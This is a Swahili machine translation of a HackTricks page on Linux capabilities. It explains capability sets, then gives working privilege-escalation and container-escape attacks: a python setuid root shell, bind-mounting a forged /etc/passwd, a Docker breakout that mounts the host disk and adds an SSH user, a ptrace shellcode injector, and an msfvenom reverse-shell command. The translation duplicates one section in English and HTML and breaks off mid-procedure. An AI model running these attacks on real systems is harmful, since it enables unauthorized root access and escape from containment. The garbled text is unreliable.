hacktricks/linux-hardening/privilege-escalation/linux-capabilities.md

# Uwezo wa Linux

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Uhispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.\\

{% embed url="https://www.rootedcon.com/" %}

## Uwezo wa Linux

Uwezo wa Linux hugawa **mamlaka ya mizizi katika vitengo vidogo na tofauti**, kuruhusu michakato kuwa na sehemu ya uwezo. Hii inapunguza hatari kwa kutokupa mamlaka kamili ya mizizi bila sababu.

### Tatizo:
- Watumiaji wa kawaida wana idhini ndogo, ikionyesha kazi kama kufungua soketi ya mtandao ambayo inahitaji ufikiaji wa mizizi.

### Seti za Uwezo:

1. **Imeorodheshwa (CapInh)**:
- **Lengo**: Inaamua uwezo unaopitishwa kutoka kwa mchakato mzazi.
- **Ufanisi**: Wakati mchakato mpya unapoundwa, unarithi uwezo kutoka kwa mzazi wake katika seti hii. Inafaa kwa kudumisha uwezo fulani kwa michakato inayozaliwa.
- **Vikwazo**: Mchakato hauwezi kupata uwezo ambao mzazi wake hakuwa nao.

2. **Halisi (CapEff)**:
- **Lengo**: Inawakilisha uwezo halisi ambao mchakato unatumia wakati wowote.
- **Ufanisi**: Ni seti ya uwezo ambayo kernel inachunguza ili kutoa idhini kwa shughuli mbalimbali. Kwa faili, seti hii inaweza kuwa alama inayoonyesha ikiwa uwezo ulioruhusiwa wa faili unapaswa kuzingatiwa kuwa halisi.
- **Umuhimu**: Seti halisi ni muhimu kwa ukaguzi wa mamlaka mara moja, ikifanya kama seti ya uwezo ya aktive ambayo mchakato unaweza kutumia.

3. **Kuruhusiwa (CapPrm)**:
- **Lengo**: Inafafanua seti kubwa ya uwezo ambao mchakato unaweza kuwa nao.
- **Ufanisi**: Mchakato unaweza kuinua uwezo kutoka kwa seti iliyoruhusiwa hadi seti yake halisi, ikimpa uwezo wa kutumia uwezo huo. Pia inaweza kuondoa uwezo kutoka kwa seti iliyoruhusiwa.
- **Kizuizi**: Inafanya kama kiwango cha juu cha uwezo ambao mchakato unaweza kuwa nao, ikahakikisha mchakato haupiti kikomo kilichopangwa cha mamlaka.

4. **Kizuizi (CapBnd)**:
- **Lengo**: Inaweka kikomo kwa uwezo ambao mchakato unaweza kupata wakati wa mzunguko wake wa maisha.
- **Ufanisi**: Hata ikiwa mchakato una uwezo fulani katika seti yake ya kurithiwa au kuruhusiwa, hauwezi kupata uwezo huo isipokuwa pia uko katika seti ya kizuizi.
- **Matumizi**: Seti hii ni muhimu hasa kwa kuzuia uwezekano wa mchakato kuongeza mamlaka yake, ikiongeza safu ya ziada ya usalama.

5. **Mazingira (CapAmb)**:
- **Lengo**: Inaruhusu uwezo fulani kuendelea kuwepo kupitia wito wa mfumo wa `execve`, ambao kwa kawaida ungefanya mchakato urejeshwe kabisa kwa uwezo wake. 
- **Ufanisi**: Inahakikisha kuwa programu zisizo na SUID ambazo hazina uwezo wa faili zinaweza kuendelea kuwa na uwezo fulani.
- **Vikwazo**: Uwezo katika seti hii unazingatia vikwazo vya seti za kurithiwa na kuruhusiwa, ikihakikisha kuwa hauzidi mamlaka yanayoruhusiwa kwa mchakato.
```python
# Code to demonstrate the interaction of different capability sets might look like this:
# Note: This is pseudo-code for illustrative purposes only.
def manage_capabilities(process):
if process.has_capability('cap_setpcap'):
process.add_capability_to_set('CapPrm', 'new_capability')
process.limit_capabilities('CapBnd')
process.preserve_capabilities_across_execve('CapAmb')
```
Kwa habari zaidi angalia:

* [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work)
* [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/)

## Uwezo wa Mchakato na Programu

### Uwezo wa Mchakato

Ili kuona uwezo wa mchakato fulani, tumia faili ya **status** katika saraka ya /proc. Kwa kuwa inatoa maelezo zaidi, hebu tuweke kikomo kwenye habari zinazohusiana na uwezo wa Linux.\
Tafadhali kumbuka kuwa kwa habari za uwezo wa mchakato zinahifadhiwa kwa kila mchakato, kwa programu katika mfumo wa faili inahifadhiwa kwa sifa zilizopanuliwa.

Unaweza kupata uwezo uliowekwa katika /usr/include/linux/capability.h

Unaweza kupata uwezo wa mchakato wa sasa kwa kutumia `cat /proc/self/status` au kwa kufanya `capsh --print`, na wa watumiaji wengine katika `/proc/<pid>/status`
```bash
cat /proc/1234/status | grep Cap
cat /proc/$$/status | grep Cap #This will print the capabilities of the current process
```
Amri hii inapaswa kurudisha mistari 5 kwenye mifumo mingi.

* CapInh = Uwezo uliorithiwa
* CapPrm = Uwezo ulioruhusiwa
* CapEff = Uwezo halisi
* CapBnd = Seti ya mipaka
* CapAmb = Seti ya uwezo wa mazingira
```bash
#These are the typical capabilities of a root owned process (all)
CapInh: 0000000000000000
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
```
## Linux Uwezo wa Kuongeza Uwezo

Kwa kutumia kifaa cha capsh, tunaweza kubadilisha nambari hizi za hexadecimali kuwa majina ya uwezo.
```bash
capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37
```
Hebu angalia sasa **uwezo** unaotumiwa na `ping`:
```bash
cat /proc/9491/status | grep Cap
CapInh:    0000000000000000
CapPrm:    0000000000003000
CapEff:    0000000000000000
CapBnd:    0000003fffffffff
CapAmb:    0000000000000000

capsh --decode=0000000000003000
0x0000000000003000=cap_net_admin,cap_net_raw
```
Ingawa hiyo inafanya kazi, kuna njia nyingine rahisi zaidi. Ili kuona uwezo wa mchakato unaofanya kazi, tumia tu zana ya **getpcaps** ikifuatiwa na kitambulisho cha mchakato (PID). Unaweza pia kutoa orodha ya vitambulisho vya mchakato.
```bash
getpcaps 1234
```
Hebu angalia hapa uwezo wa `tcpdump` baada ya kumpa faili ya binary uwezo wa kutosha (`cap_net_admin` na `cap_net_raw`) ili kusikiliza mtandao (_tcpdump inaendeshwa katika mchakato 9562_):
```bash
#The following command give tcpdump the needed capabilities to sniff traffic
$ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump

$ getpcaps 9562
Capabilities for `9562': = cap_net_admin,cap_net_raw+ep

$ cat /proc/9562/status | grep Cap
CapInh:    0000000000000000
CapPrm:    0000000000003000
CapEff:    0000000000003000
CapBnd:    0000003fffffffff
CapAmb:    0000000000000000

$ capsh --decode=0000000000003000
0x0000000000003000=cap_net_admin,cap_net_raw
```
Kama unavyoona uwezo uliotolewa unalingana na matokeo ya njia 2 za kupata uwezo wa faili.\
Zana ya _getpcaps_ hutumia wito wa mfumo wa **capget()** kuuliza uwezo uliopo kwa mchakato fulani. Wito huu wa mfumo unahitaji tu kutoa PID ili kupata habari zaidi.

### Uwezo wa Faili za Kutekelezwa

Faili za kutekelezwa zinaweza kuwa na uwezo ambao unaweza kutumiwa wakati wa utekelezaji. Kwa mfano, ni kawaida sana kupata faili ya `ping` na uwezo wa `cap_net_raw`:
```bash
getcap /usr/bin/ping
/usr/bin/ping = cap_net_raw+ep
```
Unaweza **kutafuta faili za binary zenye uwezo** kwa kutumia:
```bash
getcap -r / 2>/dev/null
```
### Kupunguza uwezo kwa kutumia capsh

Ikiwa tunapunguza uwezo wa CAP\_NET\_RAW kwa _ping_, basi zana ya ping haipaswi tena kufanya kazi.
```bash
capsh --drop=cap_net_raw --print -- -c "tcpdump"
```
Isipokuwa matokeo ya _capsh_ yenyewe, amri ya _tcpdump_ yenyewe pia inapaswa kutoa kosa.

> /bin/bash: /usr/sbin/tcpdump: Operesheni haikuruhusiwa

Kosa linaonyesha wazi kuwa amri ya ping haijiruhusu kufungua soketi ya ICMP. Sasa tunajua kwa uhakika kuwa hii inafanya kazi kama ilivyotarajiwa.

### Ondoa Uwezo

Unaweza kuondoa uwezo wa faili ya binary na
```bash
setcap -r </path/to/binary>
```
## Uwezo wa Mtumiaji

Inaonekana **niwezekana pia kumtumia mtumiaji uwezo**. Hii inamaanisha kwamba kila mchakato uliofanywa na mtumiaji utaweza kutumia uwezo wa mtumiaji.\
Kulingana na [hii](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [hii](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html), na [hii](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user), inahitajika kusanidi faili kadhaa ili kumpa mtumiaji uwezo fulani, lakini faili inayoweka uwezo kwa kila mtumiaji itakuwa `/etc/security/capability.conf`.\
Mfano wa faili:
```bash
# Simple
cap_sys_ptrace               developer
cap_net_raw                  user1

# Multiple capablities
cap_net_admin,cap_net_raw    jrnetadmin
# Identical, but with numeric values
12,13                        jrnetadmin

# Combining names and numerics
cap_sys_admin,22,25          jrsysadmin
```
## Uwezo wa Mazingira

Kwa kuchapisha programu ifuatayo, ni **inawezekana kuzindua kikao cha bash ndani ya mazingira yanayotoa uwezo**.

{% code title="ambient.c" %}
```c
/*
* Test program for the ambient capabilities
*
* compile using:
* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
* Set effective, inherited and permitted capabilities to the compiled binary
* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
*
* To get a shell with additional caps that can be inherited do:
*
* ./ambient /bin/bash
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/prctl.h>
#include <linux/capability.h>
#include <cap-ng.h>

static void set_ambient_cap(int cap) {
int rc;
capng_get_caps_process();
rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap);
if (rc) {
printf("Cannot add inheritable cap\n");
exit(2);
}
capng_apply(CAPNG_SELECT_CAPS);
/* Note the two 0s at the end. Kernel checks for these */
if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) {
perror("Cannot set cap");
exit(1);
}
}
void usage(const char * me) {
printf("Usage: %s [-c caps] new-program new-args\n", me);
exit(1);
}
int default_caplist[] = {
CAP_NET_RAW,
CAP_NET_ADMIN,
CAP_SYS_NICE,
-1
};
int * get_caplist(const char * arg) {
int i = 1;
int * list = NULL;
char * dup = strdup(arg), * tok;
for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) {
list = realloc(list, (i + 1) * sizeof(int));
if (!list) {
perror("out of memory");
exit(1);
}
list[i - 1] = atoi(tok);
list[i] = -1;
i++;
}
return list;
}
int main(int argc, char ** argv) {
int rc, i, gotcaps = 0;
int * caplist = NULL;
int index = 1; // argv index for cmd to start
if (argc < 2)
usage(argv[0]);
if (strcmp(argv[1], "-c") == 0) {
if (argc <= 3) {
usage(argv[0]);
}
caplist = get_caplist(argv[2]);
index = 3;
}
if (!caplist) {
caplist = (int * ) default_caplist;
}
for (i = 0; caplist[i] != -1; i++) {
printf("adding %d to ambient list\n", caplist[i]);
set_ambient_cap(caplist[i]);
}
printf("Ambient forking shell\n");
if (execv(argv[index], argv + index))
perror("Cannot exec");
return 0;
}
```
{% endcode %}
```bash
gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
./ambient /bin/bash
```
Ndani ya **bash inayotekelezwa na faili ya binary ya mazingira iliyoundwa**, niwezekanavyo kuona **uwezo mpya** (mtumiaji wa kawaida hatakuwa na uwezo wowote katika sehemu ya "sasa").
```bash
capsh --print
Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
```
{% hint style="danger" %}
Unaweza **kuongeza uwezo tu ambao upo** katika seti zote mbili, yaani seti ya kuruhusiwa na seti ya kurithiwa.
{% endhint %}

### Programu zenye uwezo wa uwezo/Programu zenye uwezo mdogo

**Programu zenye uwezo wa uwezo hazitatumia uwezo mpya** uliotolewa na mazingira, hata hivyo **programu zenye uwezo mdogo zitatumia** uwezo huo kwani hazitakataa. Hii inafanya programu zenye uwezo mdogo kuwa hatarini ndani ya mazingira maalum yanayotoa uwezo kwa programu.

## Uwezo wa Huduma

Kwa chaguo-msingi, **huduma inayotumia akaunti ya root itapewa uwezo wote**, na kwa baadhi ya hali hii inaweza kuwa hatari.\
Kwa hiyo, **faili ya usanidi wa huduma** inaruhusu **kutaja** **uwezo** unayotaka huduma hiyo kuwa nayo, **na** **mtumiaji** ambaye anapaswa kutekeleza huduma hiyo ili kuepuka kuendesha huduma na mamlaka zisizo za lazima.
```bash
[Service]
User=bob
AmbientCapabilities=CAP_NET_BIND_SERVICE
```
## Uwezo katika Kontena za Docker

Kwa chaguo-msingi, Docker inaweka uwezo kadhaa kwa kontena. Ni rahisi sana kuangalia uwezo huu kwa kukimbia:
```bash
docker run --rm -it  r.j3ss.co/amicontained bash
Capabilities:
BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap

# Add a capabilities
docker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash

# Add all capabilities
docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash

# Remove all and add only one
docker run --rm -it  --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

## Privesc/Container Escape

Uwezo ni muhimu wakati unapotaka **kuzuia michakato yako mwenyewe baada ya kufanya shughuli za kipekee** (kwa mfano, baada ya kuanzisha chroot na kufunga soketi). Walakini, wanaweza kutumiwa vibaya kwa kusambaza amri au hoja zenye nia mbaya ambazo kisha zinatekelezwa kama mtumiaji mkuu.

Unaweza kulazimisha uwezo kwa programu kwa kutumia `setcap`, na kuuliza haya kwa kutumia `getcap`:
```bash
#Set Capability
setcap cap_net_raw+ep /sbin/ping

#Get Capability
getcap /sbin/ping
/sbin/ping = cap_net_raw+ep
```
`+ep` inamaanisha unaweka uwezo ("-" ingeondoa) kama Ufanisi na Kuruhusiwa.

Kutambua programu katika mfumo au folda yenye uwezo:
```bash
getcap -r / 2>/dev/null
```
### Mfano wa Utekaji

Katika mfano ufuatao, faili ya binary `/usr/bin/python2.6` imeonekana kuwa na udhaifu wa kusababisha ongezeko la mamlaka:
```bash
setcap cap_setuid+ep /usr/bin/python2.7
/usr/bin/python2.7 = cap_setuid+ep

#Exploit
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
```
**Uwezo** unaohitajika na `tcpdump` ili **kuruhusu mtumiaji yeyote kusikiliza pakiti**:

```markdown
To allow any user to sniff packets using `tcpdump`, the following capabilities need to be set:

1. `CAP_NET_RAW`: This capability allows the user to create raw sockets, which is necessary for packet sniffing.

To set these capabilities, you can use the `setcap` command as follows:

```bash
sudo setcap cap_net_raw=eip /usr/sbin/tcpdump
```

This command sets the `CAP_NET_RAW` capability for the `tcpdump` binary located at `/usr/sbin/tcpdump`. With this capability set, any user will be able to run `tcpdump` and sniff packets.
```
```html
<h2>Uwezo</h2> unaohitajika na <code>tcpdump</code> ili <strong>kuruhusu mtumiaji yeyote kusikiliza pakiti</strong>:

<pre>
Ili kuruhusu mtumiaji yeyote kusikiliza pakiti kwa kutumia <code>tcpdump</code>, uwezo ufuatao unahitajika kuwekwa:

1. <code>CAP_NET_RAW</code>: Uwezo huu unaruhusu mtumiaji kuunda soketi za asili, ambayo ni muhimu kwa ajili ya kusikiliza pakiti.

Ili kuweka uwezo huu, unaweza kutumia amri ya <code>setcap</code> kama ifuatavyo:

<code>sudo setcap cap_net_raw=eip /usr/sbin/tcpdump</code>

Amri hii inaweka uwezo wa <code>CAP_NET_RAW</code> kwa faili ya <code>tcpdump</code> iliyopo kwenye njia ya <code>/usr/sbin/tcpdump</code>. Kwa kuweka uwezo huu, mtumiaji yeyote ataweza kutumia <code>tcpdump</code> na kusikiliza pakiti.
</pre>
```
```bash
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
```
### Kesi maalum ya uwezo "mtupu"

[Kutoka kwenye nyaraka](https://man7.org/linux/man-pages/man7/capabilities.7.html): Tafadhali kumbuka kuwa unaweza kumwezesha uwezo mtupu kwenye faili ya programu, na hivyo niwezekana kuunda programu ya set-user-ID-root ambayo inabadilisha set-user-ID ya mchakato unaoendesha programu kuwa 0, lakini haipati uwezo wowote kwa mchakato huo. Au, kwa maneno rahisi, ikiwa una faili ya binary ambayo:

1. Haiomilikiwi na root
2. Haina alama za `SUID`/`SGID` zilizowekwa
3. Ina uwezo mtupu (kwa mfano: `getcap myelf` inarudi `myelf =ep`)

basil **binary hiyo itaendeshwa kama root**.

## CAP\_SYS\_ADMIN

**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** ni uwezo wenye nguvu sana wa Linux, mara nyingi unalinganishwa na kiwango cha karibu-cha-root kutokana na **uwezo wake mkubwa wa utawala**, kama vile kufunga vifaa au kubadilisha vipengele vya kernel. Ingawa ni muhimu kwa kontena zinazosimulisha mifumo nzima, **`CAP_SYS_ADMIN` ina changamoto kubwa za usalama**, hasa katika mazingira ya kontena, kutokana na uwezekano wake wa kuongeza uwezo na kuhatarisha usalama wa mfumo. Kwa hiyo, matumizi yake yanahitaji tathmini kali ya usalama na usimamizi wa tahadhari, na upendeleo mkubwa wa kuondoa uwezo huu katika kontena maalum ya programu ili kuzingatia **kanuni ya uwezo mdogo** na kupunguza eneo la shambulio.

**Mfano na binary**
```bash
getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_admin+ep
```
Kwa kutumia python unaweza kufunga faili iliyobadilishwa ya _passwd_ juu ya faili halisi ya _passwd_:
```bash
cp /etc/passwd ./ #Create a copy of the passwd file
openssl passwd -1 -salt abc password #Get hash of "password"
vim ./passwd #Change roots passwords of the fake passwd file
```
Na hatimaye **funga** faili iliyobadilishwa ya `passwd` kwenye `/etc/passwd`:
```python
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/path/to/fake/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
```
Na utaweza **`su` kama root** kwa kutumia nenosiri "password".

**Mfano na mazingira (Docker breakout)**

Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya Docker kwa kutumia:
```
capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
```
Ndani ya matokeo ya awali unaweza kuona kuwa uwezo wa SYS_ADMIN umewezeshwa.

* **Kuunganisha**

Hii inaruhusu kontena ya docker kuunganisha diski ya mwenyeji na kuiwezesha kupata kwa uhuru:
```bash
fdisk -l #Get disk name
Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

mount /dev/sda /mnt/ #Mount it
cd /mnt
chroot ./ bash #You have a shell inside the docker hosts disk
```
* **Upatikanaji kamili**

Katika njia iliyotangulia tulifanikiwa kupata ufikiaji wa diski ya mwenyeji wa docker.\
Ikiwa utagundua kuwa mwenyeji anaendesha seva ya **ssh**, unaweza **kuunda mtumiaji ndani ya diski ya mwenyeji wa docker** na kufikia kupitia SSH:
```bash
#Like in the example before, the first step is to mount the docker host disk
fdisk -l
mount /dev/sda /mnt/

#Then, search for open ports inside the docker host
nc -v -n -w2 -z 172.17.0.1 1-65535
(UNKNOWN) [172.17.0.1] 2222 (?) open

#Finally, create a new user inside the docker host and use it to access via SSH
chroot /mnt/ adduser john
ssh john@172.17.0.1 -p 2222
```
## CAP\_SYS\_PTRACE

**Hii inamaanisha kuwa unaweza kutoroka kwenye chombo kwa kuingiza shellcode ndani ya mchakato fulani unaoendesha ndani ya mwenyeji.** Ili kupata ufikiaji wa michakato inayoendesha ndani ya mwenyeji, chombo kinahitaji kuendeshwa angalau na **`--pid=host`**.

**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** inaruhusu uwezo wa kutumia utambuzi na ufuatiliaji wa kazi za mfumo zinazotolewa na `ptrace(2)` na wito wa kuambatisha kumbukumbu kama vile `process_vm_readv(2)` na `process_vm_writev(2)`. Ingawa ni yenye nguvu kwa madhumuni ya uchunguzi na ufuatiliaji, ikiwa `CAP_SYS_PTRACE` inawezeshwa bila hatua za kizuizi kama vile kichujio cha seccomp kwenye `ptrace(2)`, inaweza kuhatarisha sana usalama wa mfumo. Hasa, inaweza kutumika kuzunguka vizuizi vingine vya usalama, haswa vile vilivyowekwa na seccomp, kama inavyodhihirishwa na [uthibitisho wa dhana (PoC) kama huu](https://gist.github.com/thejh/8346f47e359adecd1d53).

**Mfano na binary (python)**
```bash
getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_ptrace+ep
```

```python
import ctypes
import sys
import struct
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
class user_regs_struct(ctypes.Structure):
_fields_ = [
("r15", ctypes.c_ulonglong),
("r14", ctypes.c_ulonglong),
("r13", ctypes.c_ulonglong),
("r12", ctypes.c_ulonglong),
("rbp", ctypes.c_ulonglong),
("rbx", ctypes.c_ulonglong),
("r11", ctypes.c_ulonglong),
("r10", ctypes.c_ulonglong),
("r9", ctypes.c_ulonglong),
("r8", ctypes.c_ulonglong),
("rax", ctypes.c_ulonglong),
("rcx", ctypes.c_ulonglong),
("rdx", ctypes.c_ulonglong),
("rsi", ctypes.c_ulonglong),
("rdi", ctypes.c_ulonglong),
("orig_rax", ctypes.c_ulonglong),
("rip", ctypes.c_ulonglong),
("cs", ctypes.c_ulonglong),
("eflags", ctypes.c_ulonglong),
("rsp", ctypes.c_ulonglong),
("ss", ctypes.c_ulonglong),
("fs_base", ctypes.c_ulonglong),
("gs_base", ctypes.c_ulonglong),
("ds", ctypes.c_ulonglong),
("es", ctypes.c_ulonglong),
("fs", ctypes.c_ulonglong),
("gs", ctypes.c_ulonglong),
]

libc = ctypes.CDLL("libc.so.6")

pid=int(sys.argv[1])

# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64

# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()

# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
print("Instruction Pointer: " + hex(registers.rip))
print("Injecting Shellcode at: " + hex(registers.rip))

# Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
# Convert the byte to little endian.
shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
shellcode_byte=int(shellcode_byte_little_endian,16)

# Inject the byte.
libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)

print("Shellcode Injected!!")

# Modify the instuction pointer
registers.rip=registers.rip+2

# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
print("Final Instruction Pointer: " + hex(registers.rip))

# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)
```
**Mfano na faili (gdb)**

`gdb` na uwezo wa `ptrace`:
```
/usr/bin/gdb = cap_sys_ptrace+ep
```
# Unda Shellcode na msfvenom kuingiza kwenye kumbukumbu kupitia gdb

Ili kuunda shellcode na msfvenom na kuiingiza kwenye kumbukumbu kupitia gdb, unaweza kufuata hatua zifuatazo:

1. Kwanza, tumia msfvenom kuunda payload ya shellcode. Chagua payload inayofaa kwa kusudi lako, kama vile `linux/x86/shell_reverse_tcp`. Chini ni mfano wa amri ya msfvenom:

   ```
   msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP yako> LPORT=<Namba ya bandari> -f raw -o shellcode
   ```

   Badilisha `<IP yako>` na anwani ya IP ya mashine yako ya kusikiliza na `<Namba ya bandari>` na namba ya bandari unayotaka kutumia.

2. Baada ya kutekeleza amri hiyo, msfvenom itaunda faili ya shellcode inayoitwa "shellcode".

3. Sasa, fungua gdb na uanze kutekeleza programu ambayo unataka kuingiza shellcode ndani yake.

